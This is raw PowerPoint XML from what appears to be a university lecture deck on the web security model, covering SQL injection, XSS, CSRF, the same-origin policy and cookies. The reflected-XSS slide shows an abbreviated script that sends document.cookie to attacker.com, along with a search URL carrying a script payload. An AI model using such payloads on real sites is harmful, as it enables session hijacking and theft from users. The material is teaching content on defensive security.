            <a:ext cx="1981200" cy="3048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/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112647" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="1828800"/>
            <a:ext cx="2789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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>referer: http://www.site.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112648" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3471863"/>
            <a:ext cx="27892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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>referer: http://www.site.com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5334000"/>
            <a:ext cx="8077200" cy="8382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F89F7"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma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0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Rendering content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Security User Interface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Frames and frame busting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Injection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0AAFDFD-6958-4AC8-BA55-D6DABC5613AF}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340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13" y="2667000"/>
            <a:ext cx="1436687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4113" y="4572000"/>
            <a:ext cx="11557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905000"/>
            <a:ext cx="2436813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789613" y="1524000"/>
            <a:ext cx="16811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Victim Server</a:t>
            </a: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5805488" y="6000750"/>
            <a:ext cx="1814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Victim SQL DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14345" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="6175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46" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="4040188"/>
            <a:ext cx="1114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Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2562225" y="2070100"/>
            <a:ext cx="247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post malicious form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14348" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6184901" y="3651250"/>
            <a:ext cx="1801812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49" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7277100" y="3482975"/>
            <a:ext cx="1485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unintended </a:t>
            </a:r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14350" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119438" y="3714750"/>
            <a:ext cx="263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receive valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225675" y="237807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352" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7207250" y="3090863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353" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="37338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4354" name="Freeform 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2152650" y="2773363"/>
            <a:ext cx="4400550" cy="1703387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T1" fmla="*/ 1703387 h 1703387"/>
              <a:gd name="T2" fmla="*/ 3295651 w 4400550"/>
              <a:gd name="T3" fmla="*/ 131762 h 1703387"/>
              <a:gd name="T4" fmla="*/ 0 w 4400550"/>
              <a:gd name="T5" fmla="*/ 912812 h 1703387"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4400550"/>
              <a:gd name="T10" fmla="*/ 0 h 1703387"/>
              <a:gd name="T11" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T12" fmla="*/ 1703387 h 1703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0550" h="1703387">
                <a:moveTo>
                  <a:pt x="4400550" y="1703387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4032250" y="1179512"/>
                  <a:pt x="4029076" y="263524"/>
                  <a:pt x="3295651" y="131762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2562226" y="0"/>
                  <a:pt x="1098550" y="601662"/>
                  <a:pt x="0" y="912812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95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fld id="{46B31AD6-B944-4F9C-84AF-4B8F5BA0C400}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14643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  END</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146432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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS: reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12291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01913"/>
            <a:ext cx="1436688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9475" y="4979988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4188" y="1905000"/>
            <a:ext cx="24368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943600" y="1524000"/>
            <a:ext cx="1693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Attack Server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5562600" y="4552950"/>
            <a:ext cx="1760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Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12296" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="6873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228600" y="3886200"/>
            <a:ext cx="1557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Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2970213" y="1733550"/>
            <a:ext cx="165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visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12299" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="7731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0" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2270125"/>
            <a:ext cx="2576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receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12301" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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2" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="165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click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12303" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="263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echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12304" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="194945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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12305" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="260667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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12306" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="370522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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12307" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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2308" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="6873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9" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305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send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12310" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="30480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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12311" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="400685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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C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0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2000" y="2247900"/>
            <a:ext cx="6875463" cy="4076700"/>
            <a:chOff x="762000" y="2247900"/>
            <a:chExt cx="6875463" cy="4076700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15380" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="10668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sp>
          <p:nvSpPr>
            <p:cNvPr id="15381" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4381500" y="2247900"/>
              <a:ext cx="3255963" cy="29527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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4667250"/>
            <a:ext cx="5334000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40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt; 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40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for 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009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;script&gt; 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009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  window.open(http://attacker.com? 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009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ... document.cookie ...) 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009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 18" descr="toshiba_satellite_a105_s4284_lap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1436688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11" descr="CompaqAlphaServerES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0738" y="4446588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4" descr="DS15serverfro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4188" y="609600"/>
            <a:ext cx="24368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5943600" y="228600"/>
            <a:ext cx="1693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Attack Server</a:t>
            </a:r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6773863" y="4019550"/>
            <a:ext cx="1760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Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15370" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1069975"/>
            <a:ext cx="3211512" cy="6873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arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15371" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2971800"/>
            <a:ext cx="1557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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2392363" y="982663"/>
            <a:ext cx="2192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user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15373" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2743200"/>
            <a:ext cx="4572000" cy="14478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74" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044825" y="2986088"/>
            <a:ext cx="257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user clicks on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3300413" y="3665538"/>
            <a:ext cx="300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>
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim echoes user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15376" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3105150"/>
            <a:ext cx="5021263" cy="16192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25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1944688"/>
            <a:ext cx="4457700" cy="64611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</a:rPr>
              <a:t>http://victim.com/search.php ?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</a:rPr>
              <a:t> term = &lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458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4362450"/>
            <a:ext cx="5334000" cy="304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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2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B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com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76600" y="1639888"/>
            <a:ext cx="44577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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2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B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352104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5/18/2007" val="LastModified"/>
</p:tagLst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31745</TotalTime>
  <Words>2113</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>631</Paragraphs>
  <Slides>70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90" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>Helvetica Neue Light</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Blueprint</vt:lpstr>
      <vt:lpstr>1_Blueprint</vt:lpstr>
      <vt:lpstr>3_Blueprint</vt:lpstr>
      <vt:lpstr>4_Blueprint</vt:lpstr>
      <vt:lpstr>Acrobat Document</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Web Security Model</vt:lpstr>
      <vt:lpstr>Goals of web security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Three top web site vulnerabilites</vt:lpstr>
      <vt:lpstr>Three top web site vulnerabilites</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>XSS: reflected XSS attack</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>CSRF: sessions use cookies</vt:lpstr>
      <vt:lpstr>CSRF: basic picture</vt:lpstr>
      <vt:lpstr>Form post with cookie</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Web platform, security mechanisms</vt:lpstr>
      <vt:lpstr>HTTP </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Rendering Content</vt:lpstr>
      <vt:lpstr>Rendering and events</vt:lpstr>
      <vt:lpstr>Pages can embed content from many sources</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>Port scanning behind firewall</vt:lpstr>
      <vt:lpstr>Remote scripting</vt:lpstr>
      <vt:lpstr>Isolation</vt:lpstr>
      <vt:lpstr>Analogy</vt:lpstr>
      <vt:lpstr>Frame and iFrame</vt:lpstr>
      <vt:lpstr>Windows Interact</vt:lpstr>
      <vt:lpstr>Policy Goals</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Library import</vt:lpstr>
      <vt:lpstr>Components of browser security policy</vt:lpstr>
      <vt:lpstr>Domain Relaxation</vt:lpstr>
      <vt:lpstr>Communication</vt:lpstr>
      <vt:lpstr>window.postMessage</vt:lpstr>
      <vt:lpstr>postMessage syntax</vt:lpstr>
      <vt:lpstr>Why include “targetOrigin”?</vt:lpstr>
      <vt:lpstr>Navigation</vt:lpstr>
      <vt:lpstr>A Guninski Attack</vt:lpstr>
      <vt:lpstr>What should the policy be?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Window Policy Anomaly</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security User Interface</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed content and network attacks</vt:lpstr>
      <vt:lpstr>Lock Icon 2.0</vt:lpstr>
      <vt:lpstr>Finally:   the status Bar</vt:lpstr>
      <vt:lpstr>Cookies:   client state</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie authentication</vt:lpstr>
      <vt:lpstr>Cookie Security Policy</vt:lpstr>
      <vt:lpstr>Secure Cookies</vt:lpstr>
      <vt:lpstr>httpOnly Cookies</vt:lpstr>
      <vt:lpstr>Frames and frame busting</vt:lpstr>
      <vt:lpstr>Frames</vt:lpstr>
      <vt:lpstr>Frame Busting</vt:lpstr>
      <vt:lpstr>Better Frame Busting</vt:lpstr>
      <vt:lpstr>Redirects and Referer HEader</vt:lpstr>
      <vt:lpstr>Sites can redirect browser</vt:lpstr>
      <vt:lpstr>Referer (sic) header</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>THE   END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subject/>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy>Mohamad pishdar</cp:lastModifiedBy>
  <cp:revision>6840</cp:revision>
  <cp:lastPrinted>1998-03-10T18:42:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-08T17:19:34Z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